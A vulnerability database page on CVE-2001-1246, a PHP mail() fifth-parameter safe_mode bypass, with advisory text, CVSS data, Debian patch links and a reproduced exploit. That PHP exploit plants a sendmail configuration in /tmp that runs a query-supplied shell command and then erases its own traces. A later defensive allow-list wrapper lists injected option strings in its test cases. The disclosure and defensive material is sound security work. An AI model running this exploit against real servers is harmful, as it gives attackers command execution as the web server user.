CVE-2001-1246
CVSS 7.5
Published: 2001-06-30 00:00:00
Last revised: 2008-09-10 15:10:02

[Original] PHP 4.0.5 through 4.1.0 in safe mode does not properly cleanse the 5th parameter to the mail() function, which allows local users and possibly remote attackers to execute arbitrary commands via shell metacharacters.


[CNNVD] PHP mail() function safe_mode bypass command execution vulnerability (CNNVD-200106-211)

        
        PHP is a popular server-side web scripting language. It is powerful and easy to use, is installed by default on many Unix systems, and also runs on Windows.
        The fifth parameter of PHP's mail() function is vulnerable. A remote attacker may be able to leverage a flaw in a CGI script that passes untrusted input to this parameter in order to bypass PHP's safe_mode restrictions and execute system commands.
        The fifth parameter of mail() was introduced in PHP 4.0.5. It was previously found that this parameter was not properly filtered for shell metacharacters, which made it possible to bypass safe_mode and execute system commands ( http://www.nsfocus.com/index.php?act=sec_bug&do=view&bug_id=1593 ). That flaw was fixed in PHP 4.0.6 by escaping the parameter.
        However, mail() remains vulnerable. Its fifth parameter is passed to the MTA (the program set by sendmail_path in php.ini, by default sendmail) as additional command-line options when the mail is sent. sendmail's -Cfile option selects an alternate configuration file, and a sendmail configuration file can define a mailer that runs an arbitrary program. An attacker who can write a configuration file into a world-writable directory and pass -C through mail() therefore gets arbitrary command execution as the web server user, bypassing safe_mode. The option string itself contains no shell metacharacters, so the escaping added in 4.0.6 does not stop it; the problem is that arbitrary MTA options are forwarded at all.
        

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [likely to cause information disclosure]
Integrity impact: PARTIAL [may allow system files to be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Access complexity: LOW [no special access conditions are required to exploit]
Access vector: [--]
Authentication: NONE [no authentication is required to exploit]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1246
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1246
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200106-211
(official data source) CNNVD

- Other links and resources

http://www.iss.net/security_center/static/6787.php
(VENDOR_ADVISORY)  XF  php-safemode-elevate-privileges(6787)
http://www.php.net/do_download.php?download_file=php-4.1.2.tar.gz
(UNKNOWN)  CONFIRM  http://www.php.net/do_download.php?download_file=php-4.1.2.tar.gz
http://www.securityfocus.com/bid/2954
(UNKNOWN)  BID  2954
http://www.redhat.com/support/errata/RHSA-2003-159.html
(UNKNOWN)  REDHAT  RHSA-2003:159
http://www.redhat.com/support/errata/RHSA-2002-129.html
(UNKNOWN)  REDHAT  RHSA-2002:129
http://www.redhat.com/support/errata/RHSA-2002-102.html
(UNKNOWN)  REDHAT  RHSA-2002:102
http://online.securityfocus.com/archive/1/194425
(UNKNOWN)  BUGTRAQ  20010630 php breaks safe mode

- Vulnerability information

PHP mail() function safe_mode bypass command execution vulnerability
High severity   Design error
2001-06-30 00:00:00 2005-05-02 00:00:00
Local
        
        

- Advisories and patches

        Temporary workarounds:
        If you cannot install a patch or upgrade immediately, CNNVD recommends the following measures to reduce the risk:
        * If other web users on your host are able to create PHP scripts, temporarily disable the mail() function in php.ini:
        disable_functions = mail
        then restart the web server. disable_functions is a system-level directive that can only be set in php.ini; scripts cannot re-enable the function with ini_set(), so the setting holds for every virtual host served by that PHP build.
        * Rebuild PHP from the latest CVS sources.
        Vendor patches:
        Debian
        ------
        Debian has released a security advisory (DSA-168-1) together with the corresponding patches:
        DSA-168-1: New PHP packages fix several vulnerabilities
        Link:
        http://www.debian.org/security/2002/dsa-168

        Patch downloads:
        Source archives:
        
        http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-0potato1.2.dsc

        Size/MD5 checksum: 1079 82d2b9adff31130eafe78fe9c647d098
        
        http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-0potato1.2.diff.gz

        Size/MD5 checksum: 39264 e44f4917ce887f53ac7019ab4e3692ba
        
        http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18.orig.tar.gz

        Size/MD5 checksum: 2203818 da541ac71d951c47a011ceb26664ba2d
        
        http://security.debian.org/pool/updates/main/p/php4/php4_4.0.3pl1-0potato4.dsc

        Size/MD5 checksum: 1125 e9b5dbf3554c63dd654e69c83da63a97
        
        http://security.debian.org/pool/updates/main/p/php4/php4_4.0.3pl1-0potato4.diff.gz

        Size/MD5 checksum: 134587 9a862082a0b60f6e2f0fa9c993d3ff19
        
        http://security.debian.org/pool/updates/main/p/php4/php4_4.0.3pl1.orig.tar.gz

        Size/MD5 checksum: 2214630 e65b706a7fc4469d1ccd564ef8a2c534
        Alpha architecture:
        
        http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-0potato1.2_alpha.deb

        Size/MD5 checksum: 438822 748bb657dff328c22920c186e2ab83a1
        
        http://security.debian.org/pool/updates/main/p/php3/php3-cgi_3.0.18-0potato1.2_alpha.deb

        Size/MD5 checksum: 619332 e9dca7c64949f2d635ff5ed7da682c5d
        
        http://security.debian.org/pool/updates/main/p/php4/php4_4.0.3pl1-0potato4_alpha.deb

        Size/MD5 checksum: 520090 76a0ac1f943c108f28a4238723415367
        
        http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.0.3pl1-0potato4_alpha.deb

        Size/MD5 checksum: 868874 b8041d6976c11fbb63d0481869351658
        ARM architecture:
        
        http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-0potato1.2_arm.deb

        Size/MD5 checksum: 379276 3900254a218ea8b08f12adcee5826978
        
        http://security.debian.org/pool/updates/main/p/php3/php3-cgi_3.0.18-0potato1.2_arm.deb

        Size/MD5 checksum: 490638 de60ee781cd3e2dc820fef82a1fe08a8
        Intel IA-32 architecture:
        
        http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-0potato1.2_i386.deb

        Size/MD5 checksum: 359858 6ee0615cac086a0da432ed40e0edab68
        
        http://security.debian.org/pool/updates/main/p/php3/php3-cgi_3.0.18-0potato1.2_i386.deb

        Size/MD5 checksum: 458174 be4d1d9c54ba0207f39dedfaaaa7d748
        
        http://security.debian.org/pool/updates/main/p/php4/php4_4.0.3pl1-0potato4_i386.deb

        Size/MD5 checksum: 412254 37751e39ac9688d17965cf947ed7f6fc
        
        http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.0.3pl1-0potato4_i386.deb

        Size/MD5 checksum: 635076 b1dfc5587ea2719ff5a789fc02bc27ec
        Motorola 680x0 architecture:
        
        http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-0potato1.2_m68k.deb

        Size/MD5 checksum: 355170 9b7fef1df1cc28988eb3f7fdde94dd61
        
        http://security.debian.org/pool/updates/main/p/php3/php3-cgi_3.0.18-0potato1.2_m68k.deb

        Size/MD5 checksum: 429244 1aec470dce3cc9babe341661c7023281
        
        http://security.debian.org/pool/updates/main/p/php4/php4_4.0.3pl1-0potato4_m68k.deb

        Size/MD5 checksum: 408462 29b1bc7739a65d4ebd95d848bccbaf5c
        
        http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.0.3pl1-0potato4_m68k.deb

        Size/MD5 checksum: 592990 2d3fbdc339ba1692d1c7e98fc50b9920
        PowerPC architecture:
        
        http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-0potato1.2_powerpc.deb

        Size/MD5 checksum: 380012 c2990c5ec38b1fc4d218a51c750f9963
        
        http://security.debian.org/pool/updates/main/p/php3/php3-cgi_3.0.18-0potato1.2_powerpc.deb

        Size/MD5 checksum: 492568 eebeab3f920fad4812f418045750a489
        
        http://security.debian.org/pool/updates/main/p/php4/php4_4.0.3pl1-0potato4_powerpc.deb

        Size/MD5 checksum: 451892 54e8183df00abee5c8498b4caed0a679
        
        http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.0.3pl1-0potato4_powerpc.deb

        Size/MD5 checksum: 689728 bd2aeebd0605f35395106a4ce0c76cef
        Sun Sparc architecture:
        
        http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-0potato1.2_sparc.deb

        Size/MD5 checksum: 371252 f3a0fb13377a8b5b67a851d2c204b87d
        
        http://security.debian.org/pool/updates/main/p/php3/php3-cgi_3.0.18-0potato1.2_sparc.deb

        Size/MD5 checksum: 483476 e749a895f8e9d429d7e3d6eb0f35a945
        
        http://security.debian.org/pool/updates/main/p/php4/php4_4.0.3pl1-0potato4_sparc.deb

        Size/MD5 checksum: 435060 be65d0d8c66e0bdcf5aa3a337a019ea6
        
        http://security.debian.org/pool/updates/main/p/php4/php4-c

- Vulnerability information (20985)

PHP 4.x SafeMode Arbitrary File Execution Vulnerability (EDBID:20985)
php local
2001-06-30 Verified
0 Wojciech Purczynski
N/A
source: http://www.securityfocus.com/bid/2954/info

PHP is the Personal HomePage development toolkit, distributed by the PHP.net, and maintained by the PHP Development Team in public domain.

A problem with the toolkit could allow elevated privileges, and potentially unauthorized access to restricted resources. A local user may upload a malicious php script, and execute it with a custom query string.

This makes it possible for a local user to execute commands as the HTTP process UID, and potentially gain access with the same privileges of the HTTP UID.

It has been reported that the proposed fix does not entirely fix the problem, as it's possible to pass command line parameters to sendmail when safe_mode is enabled. This may be done through the 5th argument permitted by safe_mode. 

<?php
// Exploit as published (BID 2954). The command to run originally arrived as
// $cmd through register_globals from the query string; it is read explicitly
// from $HTTP_GET_VARS here (the pre-4.1 name of $_GET) so the script also
// works with register_globals off.
$cmd = isset($HTTP_GET_VARS['cmd']) ? $HTTP_GET_VARS['cmd'] : 'id';

$script = tempnam("/tmp", "script");   // shell script that sendmail will run
$cf     = tempnam("/tmp", "cf");       // attacker-controlled sendmail.cf

// Minimal sendmail configuration: queue directory in /tmp, ruleset 0 ("parse")
// resolves every address to the "local" mailer, and that mailer is /bin/sh
// invoked on $script. The $* / $# / $@ / $1 / $: tokens are sendmail syntax;
// PHP leaves them alone because none of them is a valid variable name.
$fd = fopen($cf, "w");
fwrite($fd, "OQ/tmp
Sparse=0
R$*" . chr(9) . "$#local $@ $1 $: $1
Mlocal, P=/bin/sh, A=sh $script");
fclose($fd);

// The script first removes its own traces, then runs the requested command.
$fd = fopen($script, "w");
fwrite($fd, "rm -f $script $cf; ");
fwrite($fd, $cmd);
fclose($fd);

// "-C$cf" contains no shell metacharacters, so the escaping added in 4.0.6
// leaves it intact and sendmail starts with the attacker's configuration file.
mail("nobody", "", "", "", "-C$cf");
?>
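The exploit above, and the description earlier on this page, make the same point: escaping the fifth argument of mail() is not enough, because "-C/tmp/..." is a clean option string that still hands sendmail an attacker-controlled configuration. The following PHP wrapper is an added example, not code from the advisory, from the exploit author, or from PHP itself. It shows the allow-list policy a caller of mail() needs when any part of the fifth argument can be influenced by a user: accept either nothing or a single validated "-f<address>" envelope-sender override, and refuse everything else. The function names mail_extra_params_allowed and mail_restricted and the sample inputs are hypothetical.

```php
<?php
/*
 * Added example (not part of the original advisory or of PHP): allow-list the
 * additional_parameters argument of mail() instead of escaping it. The exploit
 * on this page works with an option string that has no shell metacharacters,
 * so the only safe policy is to permit a fixed, tiny set of MTA options.
 * Function names are hypothetical.
 */

/**
 * Decide whether an additional_parameters string may be forwarded to the MTA.
 * Permitted: the empty string, or exactly one "-f<address>" envelope-sender
 * override whose address is a plain, validated e-mail address.
 * Returns true on accept, false on reject.
 */
function mail_extra_params_allowed($extra)
{
    if ($extra === '') {
        return true;
    }
    // One token only: the pattern allows no whitespace, so a second option
    // cannot be smuggled in ("-fa@b.com -C/tmp/x" fails here). The address
    // character class excludes quotes, backslashes and shell characters.
    if (!preg_match('/^-f([A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,})$/', $extra, $m)) {
        return false;
    }
    // Independent second check with PHP's own e-mail validator.
    return filter_var($m[1], FILTER_VALIDATE_EMAIL) !== false;
}

/**
 * Drop-in replacement for mail() that enforces the policy above. A rejected
 * option string is logged and the mail is not sent at all (returns false),
 * rather than being forwarded in any form.
 */
function mail_restricted($to, $subject, $message, $headers = '', $extra = '')
{
    if (!mail_extra_params_allowed($extra)) {
        error_log('mail_restricted: refused additional_parameters: ' . $extra);
        return false;
    }
    return mail($to, $subject, $message, $headers, $extra);
}

// Constructed inputs exercising the check; mail() itself is never reached here.
$cases = array(
    ''                                 => true,   // no options at all
    '-fbounces@example.com'            => true,   // legitimate envelope sender
    '-C/tmp/cfAbC123'                  => false,  // the exploit's config-file override
    '-X/var/www/html/shell.php'        => false,  // sendmail trace-log write
    '-fbounces@example.com -C/tmp/cf'  => false,  // second option smuggled in
    '-fa@b.c;id'                       => false,  // metacharacter, also caught
    '-oQ/tmp'                          => false,  // queue directory override
);
foreach ($cases as $extra => $expected) {
    $got = mail_extra_params_allowed($extra);
    printf("%-40s %s\n", var_export($extra, true), $got === $expected ? 'ok' : 'MISMATCH');
}
```

Running the block prints "ok" for every constructed case. The policy is deliberately narrower than "escape and forward": an option that is harmless today (such as -X writing a trace log) is still a file write under the web server's identity, so anything not explicitly needed is refused rather than sanitized.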
		

- Vulnerability information

579
PHP Safe Mode mail() Function 5th Parameter Arbitrary Command Execution
Local Access Required, Input Manipulation
Loss of Integrity, Upgrade
Vendor Verified

- Vulnerability description

- Timeline

2001-06-30 Unknown
Unknown Unknown

- Solution

Upgrade to PHP 4.1.2 or later. The CVE entry above lists 4.0.5 through 4.1.0 as affected, and the vendor reference points at the php-4.1.2 release, so 4.1.0 itself is not a fixed version. An upgrade is required; the only workaround is to disable mail() entirely via disable_functions.

- Related references

- Vulnerability author

Unknown or Incomplete
 

 

About the SCAP Chinese Community

The SCAP Chinese Community (SCAP中文社区) is the first Chinese-language open community devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE, CWE and OVAL are registered trademarks of the MITRE Corporation; their official data sources are maintained on MITRE's own websites.